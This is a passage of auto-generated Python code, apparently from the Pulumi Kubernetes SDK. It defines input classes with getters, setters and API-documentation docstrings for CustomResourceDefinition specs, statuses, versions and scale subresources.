group is the API group of the defined custom resource. The custom resources are served under `/apis/<group>/...`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`).
"""
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter
def names(self) -> Optional[pulumi.Input['CustomResourceDefinitionNamesPatchArgs']]:
"""
names specify the resource and kind names for the custom resource.
"""
return pulumi.get(self, "names")
@names.setter
def names(self, value: Optional[pulumi.Input['CustomResourceDefinitionNamesPatchArgs']]):
pulumi.set(self, "names", value)
@property
@pulumi.getter(name="preserveUnknownFields")
def preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
"""
preserveUnknownFields indicates that object fields which are not specified in the OpenAPI schema should be preserved when persisting to storage. apiVersion, kind, metadata and known fields inside metadata are always preserved. This field is deprecated in favor of setting `x-preserve-unknown-fields` to true in `spec.versions[*].schema.openAPIV3Schema`. See https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#field-pruning for details.
"""
return pulumi.get(self, "preserve_unknown_fields")
@preserve_unknown_fields.setter
def preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "preserve_unknown_fields", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
"""
scope indicates whether the defined custom resource is cluster- or namespace-scoped. Allowed values are `Cluster` and `Namespaced`.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def versions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionPatchArgs']]]]:
"""
versions is the list of all API versions of the defined custom resource. Version names are used to compute the order in which served versions are listed in API discovery. If the version string is "kube-like", it will sort above non "kube-like" version strings, which are ordered lexicographically. "Kube-like" versions start with a "v", then are followed by a number (the major version), then optionally the string "alpha" or "beta" and another number (the minor version). These are sorted first by GA > beta > alpha (where GA is a version with no suffix such as beta or alpha), and then by comparing major version, then minor version. An example sorted list of versions: v10, v2, v1, v11beta2, v10beta3, v3beta1, v12alpha1, v11alpha2, foo1, foo10.
"""
return pulumi.get(self, "versions")
@versions.setter
def versions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionPatchArgs']]]]):
pulumi.set(self, "versions", value)
@pulumi.input_type
class CustomResourceDefinitionSpecArgs:
def __init__(__self__, *,
group: pulumi.Input[str],
names: pulumi.Input['CustomResourceDefinitionNamesArgs'],
scope: pulumi.Input[str],
versions: pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]],
conversion: Optional[pulumi.Input['CustomResourceConversionArgs']] = None,
preserve_unknown_fields: Optional[pulumi.Input[bool]] = None):
"""
CustomResourceDefinitionSpec describes how a user wants their resource to appear
:param pulumi.Input[str] group: group is the API group of the defined custom resource. The custom resources are served under `/apis/<group>/...`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`).
:param pulumi.Input['CustomResourceDefinitionNamesArgs'] names: names specify the resource and kind names for the custom resource.
:param pulumi.Input[str] scope: scope indicates whether the defined custom resource is cluster- or namespace-scoped. Allowed values are `Cluster` and `Namespaced`.
:param pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]] versions: versions is the list of all API versions of the defined custom resource. Version names are used to compute the order in which served versions are listed in API discovery. If the version string is "kube-like", it will sort above non "kube-like" version strings, which are ordered lexicographically. "Kube-like" versions start with a "v", then are followed by a number (the major version), then optionally the string "alpha" or "beta" and another number (the minor version). These are sorted first by GA > beta > alpha (where GA is a version with no suffix such as beta or alpha), and then by comparing major version, then minor version. An example sorted list of versions: v10, v2, v1, v11beta2, v10beta3, v3beta1, v12alpha1, v11alpha2, foo1, foo10.
:param pulumi.Input['CustomResourceConversionArgs'] conversion: conversion defines conversion settings for the CRD.
:param pulumi.Input[bool] preserve_unknown_fields: preserveUnknownFields indicates that object fields which are not specified in the OpenAPI schema should be preserved when persisting to storage. apiVersion, kind, metadata and known fields inside metadata are always preserved. This field is deprecated in favor of setting `x-preserve-unknown-fields` to true in `spec.versions[*].schema.openAPIV3Schema`. See https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#field-pruning for details.
"""
pulumi.set(__self__, "group", group)
pulumi.set(__self__, "names", names)
pulumi.set(__self__, "scope", scope)
pulumi.set(__self__, "versions", versions)
if conversion is not None:
pulumi.set(__self__, "conversion", conversion)
if preserve_unknown_fields is not None:
pulumi.set(__self__, "preserve_unknown_fields", preserve_unknown_fields)
@property
@pulumi.getter
def group(self) -> pulumi.Input[str]:
"""
group is the API group of the defined custom resource. The custom resources are served under `/apis/<group>/...`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`).
"""
return pulumi.get(self, "group")
@group.setter
def group(self, value: pulumi.Input[str]):
pulumi.set(self, "group", value)
@property
@pulumi.getter
def names(self) -> pulumi.Input['CustomResourceDefinitionNamesArgs']:
"""
names specify the resource and kind names for the custom resource.
"""
return pulumi.get(self, "names")
@names.setter
def names(self, value: pulumi.Input['CustomResourceDefinitionNamesArgs']):
pulumi.set(self, "names", value)
@property
@pulumi.getter
def scope(self) -> pulumi.Input[str]:
"""
scope indicates whether the defined custom resource is cluster- or namespace-scoped. Allowed values are `Cluster` and `Namespaced`.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: pulumi.Input[str]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def versions(self) -> pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]]:
"""
versions is the list of all API versions of the defined custom resource. Version names are used to compute the order in which served versions are listed in API discovery. If the version string is "kube-like", it will sort above non "kube-like" version strings, which are ordered lexicographically. "Kube-like" versions start with a "v", then are followed by a number (the major version), then optionally the string "alpha" or "beta" and another number (the minor version). These are sorted first by GA > beta > alpha (where GA is a version with no suffix such as beta or alpha), and then by comparing major version, then minor version. An example sorted list of versions: v10, v2, v1, v11beta2, v10beta3, v3beta1, v12alpha1, v11alpha2, foo1, foo10.
"""
return pulumi.get(self, "versions")
@versions.setter
def versions(self, value: pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]]):
pulumi.set(self, "versions", value)
@property
@pulumi.getter
def conversion(self) -> Optional[pulumi.Input['CustomResourceConversionArgs']]:
"""
conversion defines conversion settings for the CRD.
"""
return pulumi.get(self, "conversion")
@conversion.setter
def conversion(self, value: Optional[pulumi.Input['CustomResourceConversionArgs']]):
pulumi.set(self, "conversion", value)
@property
@pulumi.getter(name="preserveUnknownFields")
def preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
"""
preserveUnknownFields indicates that object fields which are not specified in the OpenAPI schema should be preserved when persisting to storage. apiVersion, kind, metadata and known fields inside metadata are always preserved. This field is deprecated in favor of setting `x-preserve-unknown-fields` to true in `spec.versions[*].schema.openAPIV3Schema`. See https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#field-pruning for details.
"""
return pulumi.get(self, "preserve_unknown_fields")
@preserve_unknown_fields.setter
def preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "preserve_unknown_fields", value)
@pulumi.input_type
class CustomResourceDefinitionStatusArgs:
def __init__(__self__, *,
accepted_names: pulumi.Input['CustomResourceDefinitionNamesArgs'],
stored_versions: pulumi.Input[Sequence[pulumi.Input[str]]],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]]] = None):
"""
CustomResourceDefinitionStatus indicates the state of the CustomResourceDefinition
:param pulumi.Input['CustomResourceDefinitionNamesArgs'] accepted_names: acceptedNames are the names that are actually being used to serve discovery. They may be different than the names in spec.
:param pulumi.Input[Sequence[pulumi.Input[str]]] stored_versions: storedVersions lists all versions of CustomResources that were ever persisted. Tracking these versions allows a migration path for stored versions in etcd. The field is mutable so a migration controller can finish a migration to another version (ensuring no old objects are left in storage), and then remove the rest of the versions from this list. Versions may not be removed from `spec.versions` while they exist in this list.
:param pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]] conditions: conditions indicate state for particular aspects of a CustomResourceDefinition
"""
pulumi.set(__self__, "accepted_names", accepted_names)
pulumi.set(__self__, "stored_versions", stored_versions)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter(name="acceptedNames")
def accepted_names(self) -> pulumi.Input['CustomResourceDefinitionNamesArgs']:
"""
acceptedNames are the names that are actually being used to serve discovery. They may be different than the names in spec.
"""
return pulumi.get(self, "accepted_names")
@accepted_names.setter
def accepted_names(self, value: pulumi.Input['CustomResourceDefinitionNamesArgs']):
pulumi.set(self, "accepted_names", value)
@property
@pulumi.getter(name="storedVersions")
def stored_versions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
storedVersions lists all versions of CustomResources that were ever persisted. Tracking these versions allows a migration path for stored versions in etcd. The field is mutable so a migration controller can finish a migration to another version (ensuring no old objects are left in storage), and then remove the rest of the versions from this list. Versions may not be removed from `spec.versions` while they exist in this list.
"""
return pulumi.get(self, "stored_versions")
@stored_versions.setter
def stored_versions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "stored_versions", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]]]:
"""
conditions indicate state for particular aspects of a CustomResourceDefinition
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class CustomResourceDefinitionVersionPatchArgs:
def __init__(__self__, *,
additional_printer_columns: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]]] = None,
deprecated: Optional[pulumi.Input[bool]] = None,
deprecation_warning: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input['CustomResourceValidationPatchArgs']] = None,
served: Optional[pulumi.Input[bool]] = None,
storage: Optional[pulumi.Input[bool]] = None,
subresources: Optional[pulumi.Input['CustomResourceSubresourcesPatchArgs']] = None):
"""
CustomResourceDefinitionVersion describes a version for CRD.
:param pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]] additional_printer_columns: additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
:param pulumi.Input[bool] deprecated: deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
:param pulumi.Input[str] deprecation_warning: deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
:param pulumi.Input[str] name: name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
:param pulumi.Input['CustomResourceValidationPatchArgs'] schema: schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
:param pulumi.Input[bool] served: served is a flag enabling/disabling this version from being served via REST APIs
:param pulumi.Input[bool] storage: storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
:param pulumi.Input['CustomResourceSubresourcesPatchArgs'] subresources: subresources specify what subresources this version of the defined custom resource have.
"""
if additional_printer_columns is not None:
pulumi.set(__self__, "additional_printer_columns", additional_printer_columns)
if deprecated is not None:
pulumi.set(__self__, "deprecated", deprecated)
if deprecation_warning is not None:
pulumi.set(__self__, "deprecation_warning", deprecation_warning)
if name is not None:
pulumi.set(__self__, "name", name)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if served is not None:
pulumi.set(__self__, "served", served)
if storage is not None:
pulumi.set(__self__, "storage", storage)
if subresources is not None:
pulumi.set(__self__, "subresources", subresources)
@property
@pulumi.getter(name="additionalPrinterColumns")
def additional_printer_columns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]]]:
"""
additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
"""
return pulumi.get(self, "additional_printer_columns")
@additional_printer_columns.setter
def additional_printer_columns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]]]):
pulumi.set(self, "additional_printer_columns", value)
@property
@pulumi.getter
def deprecated(self) -> Optional[pulumi.Input[bool]]:
"""
deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
"""
return pulumi.get(self, "deprecated")
@deprecated.setter
def deprecated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deprecated", value)
@property
@pulumi.getter(name="deprecationWarning")
def deprecation_warning(self) -> Optional[pulumi.Input[str]]:
"""
deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
"""
return pulumi.get(self, "deprecation_warning")
@deprecation_warning.setter
def deprecation_warning(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deprecation_warning", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input['CustomResourceValidationPatchArgs']]:
"""
schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input['CustomResourceValidationPatchArgs']]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter
def served(self) -> Optional[pulumi.Input[bool]]:
"""
served is a flag enabling/disabling this version from being served via REST APIs
"""
return pulumi.get(self, "served")
@served.setter
def served(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "served", value)
@property
@pulumi.getter
def storage(self) -> Optional[pulumi.Input[bool]]:
"""
storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
"""
return pulumi.get(self, "storage")
@storage.setter
def storage(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "storage", value)
@property
@pulumi.getter
def subresources(self) -> Optional[pulumi.Input['CustomResourceSubresourcesPatchArgs']]:
"""
subresources specify what subresources this version of the defined custom resource have.
"""
return pulumi.get(self, "subresources")
@subresources.setter
def subresources(self, value: Optional[pulumi.Input['CustomResourceSubresourcesPatchArgs']]):
pulumi.set(self, "subresources", value)
@pulumi.input_type
class CustomResourceDefinitionVersionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
served: pulumi.Input[bool],
storage: pulumi.Input[bool],
additional_printer_columns: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]]] = None,
deprecated: Optional[pulumi.Input[bool]] = None,
deprecation_warning: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input['CustomResourceValidationArgs']] = None,
subresources: Optional[pulumi.Input['CustomResourceSubresourcesArgs']] = None):
"""
CustomResourceDefinitionVersion describes a version for CRD.
:param pulumi.Input[str] name: name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
:param pulumi.Input[bool] served: served is a flag enabling/disabling this version from being served via REST APIs
:param pulumi.Input[bool] storage: storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
:param pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]] additional_printer_columns: additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
:param pulumi.Input[bool] deprecated: deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
:param pulumi.Input[str] deprecation_warning: deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
:param pulumi.Input['CustomResourceValidationArgs'] schema: schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
:param pulumi.Input['CustomResourceSubresourcesArgs'] subresources: subresources specify what subresources this version of the defined custom resource have.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "served", served)
pulumi.set(__self__, "storage", storage)
if additional_printer_columns is not None:
pulumi.set(__self__, "additional_printer_columns", additional_printer_columns)
if deprecated is not None:
pulumi.set(__self__, "deprecated", deprecated)
if deprecation_warning is not None:
pulumi.set(__self__, "deprecation_warning", deprecation_warning)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if subresources is not None:
pulumi.set(__self__, "subresources", subresources)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def served(self) -> pulumi.Input[bool]:
"""
served is a flag enabling/disabling this version from being served via REST APIs
"""
return pulumi.get(self, "served")
@served.setter
def served(self, value: pulumi.Input[bool]):
pulumi.set(self, "served", value)
@property
@pulumi.getter
def storage(self) -> pulumi.Input[bool]:
"""
storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
"""
return pulumi.get(self, "storage")
@storage.setter
def storage(self, value: pulumi.Input[bool]):
pulumi.set(self, "storage", value)
@property
@pulumi.getter(name="additionalPrinterColumns")
def additional_printer_columns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]]]:
"""
additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
"""
return pulumi.get(self, "additional_printer_columns")
@additional_printer_columns.setter
def additional_printer_columns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]]]):
pulumi.set(self, "additional_printer_columns", value)
@property
@pulumi.getter
def deprecated(self) -> Optional[pulumi.Input[bool]]:
"""
deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
"""
return pulumi.get(self, "deprecated")
@deprecated.setter
def deprecated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deprecated", value)
@property
@pulumi.getter(name="deprecationWarning")
def deprecation_warning(self) -> Optional[pulumi.Input[str]]:
"""
deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
"""
return pulumi.get(self, "deprecation_warning")
@deprecation_warning.setter
def deprecation_warning(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deprecation_warning", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input['CustomResourceValidationArgs']]:
"""
schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input['CustomResourceValidationArgs']]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter
def subresources(self) -> Optional[pulumi.Input['CustomResourceSubresourcesArgs']]:
"""
subresources specify what subresources this version of the defined custom resource have.
"""
return pulumi.get(self, "subresources")
@subresources.setter
def subresources(self, value: Optional[pulumi.Input['CustomResourceSubresourcesArgs']]):
pulumi.set(self, "subresources", value)
@pulumi.input_type
class CustomResourceDefinitionArgs:
def __init__(__self__, *,
spec: pulumi.Input['CustomResourceDefinitionSpecArgs'],
api_version: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input['_meta.v1.ObjectMetaArgs']] = None,
status: Optional[pulumi.Input['CustomResourceDefinitionStatusArgs']] = None):
"""
CustomResourceDefinition represents a resource that should be exposed on the API server. Its name MUST be in the format <.spec.name>.<.spec.group>.
:param pulumi.Input['CustomResourceDefinitionSpecArgs'] spec: spec describes how the user wants the resources to appear
:param pulumi.Input[str] api_version: APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
:param pulumi.Input[str] kind: Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param pulumi.Input['_meta.v1.ObjectMetaArgs'] metadata: Standard object's metadata More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
:param pulumi.Input['CustomResourceDefinitionStatusArgs'] status: status indicates the actual state of the CustomResourceDefinition
"""
pulumi.set(__self__, "spec", spec)
if api_version is not None:
pulumi.set(__self__, "api_version", 'apiextensions.k8s.io/v1')
if kind is not None:
pulumi.set(__self__, "kind", 'CustomResourceDefinition')
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def spec(self) -> pulumi.Input['CustomResourceDefinitionSpecArgs']:
"""
spec describes how the user wants the resources to appear
"""
return pulumi.get(self, "spec")
@spec.setter
def spec(self, value: pulumi.Input['CustomResourceDefinitionSpecArgs']):
pulumi.set(self, "spec", value)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[pulumi.Input[str]]:
"""
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
"""
return pulumi.get(self, "api_version")
@api_version.setter
def api_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_version", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input['_meta.v1.ObjectMetaArgs']]:
"""
Standard object's metadata More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input['_meta.v1.ObjectMetaArgs']]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input['CustomResourceDefinitionStatusArgs']]:
"""
status indicates the actual state of the CustomResourceDefinition
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input['CustomResourceDefinitionStatusArgs']]):
pulumi.set(self, "status", value)
@pulumi.input_type
class CustomResourceSubresourceScalePatchArgs:
def __init__(__self__, *,
label_selector_path: Optional[pulumi.Input[str]] = None,
spec_replicas_path: Optional[pulumi.Input[str]] = None,
status_replicas_path: Optional[pulumi.Input[str]] = None):
"""
CustomResourceSubresourceScale defines how to serve the scale subresource for CustomResources.
:param pulumi.Input[str] label_selector_path: labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
:param pulumi.Input[str] spec_replicas_path: specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
:param pulumi.Input[str] status_replicas_path: statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
"""
if label_selector_path is not None:
pulumi.set(__self__, "label_selector_path", label_selector_path)
if spec_replicas_path is not None:
pulumi.set(__self__, "spec_replicas_path", spec_replicas_path)
if status_replicas_path is not None:
pulumi.set(__self__, "status_replicas_path", status_replicas_path)
@property
@pulumi.getter(name="labelSelectorPath")
def label_selector_path(self) -> Optional[pulumi.Input[str]]:
"""
labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
"""
return pulumi.get(self, "label_selector_path")
@label_selector_path.setter
def label_selector_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label_selector_path", value)
@property
@pulumi.getter(name="specReplicasPath")
def spec_replicas_path(self) -> Optional[pulumi.Input[str]]:
"""
specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
"""
return pulumi.get(self, "spec_replicas_path")
@spec_replicas_path.setter
def spec_replicas_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "spec_replicas_path", value)
@property
@pulumi.getter(name="statusReplicasPath")
def status_replicas_path(self) -> Optional[pulumi.Input[str]]:
"""
statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
"""
return pulumi.get(self, "status_replicas_path")
@status_replicas_path.setter
def status_replicas_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status_replicas_path", value)
@pulumi.input_type
class CustomResourceSubresourceScaleArgs:
def __init__(__self__, *,
spec_replicas_path: pulumi.Input[str],
status_replicas_path: pulumi.Input[str],
label_selector_path: Optional[pulumi.Input[str]] = None):
"""
CustomResourceSubresourceScale defines how to serve the scale subresource for CustomResources.
:param pulumi.Input[str] spec_replicas_path: specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
:param pulumi.Input[str] status_replicas_path: statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
:param pulumi.Input[str] label_selector_path: labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
"""
pulumi.set(__self__, "spec_replicas_path", spec_replicas_path)
pulumi.set(__self__, "status_replicas_path", status_replicas_path)
if label_selector_path is not None:
pulumi.set(__self__, "label_selector_path", label_selector_path)
@property
@pulumi.getter(name="specReplicasPath")
def spec_replicas_path(self) -> pulumi.Input[str]:
"""
specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
"""
return pulumi.get(self, "spec_replicas_path")
@spec_replicas_path.setter
def spec_replicas_path(self, value: pulumi.Input[str]):
pulumi.set(self, "spec_replicas_path", value)
@property
@pulumi.getter(name="statusReplicasPath")
def status_replicas_path(self) -> pulumi.Input[str]:
"""
statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
"""
return pulumi.get(self, "status_replicas_path")
@status_replicas_path.setter
def status_replicas_path(self, value: pulumi.Input[str]):
pulumi.set(self, "status_replicas_path", value)
@property
@pulumi.getter(name="labelSelectorPath")
def label_selector_path(self) -> Optional[pulumi.Input[str]]:
"""
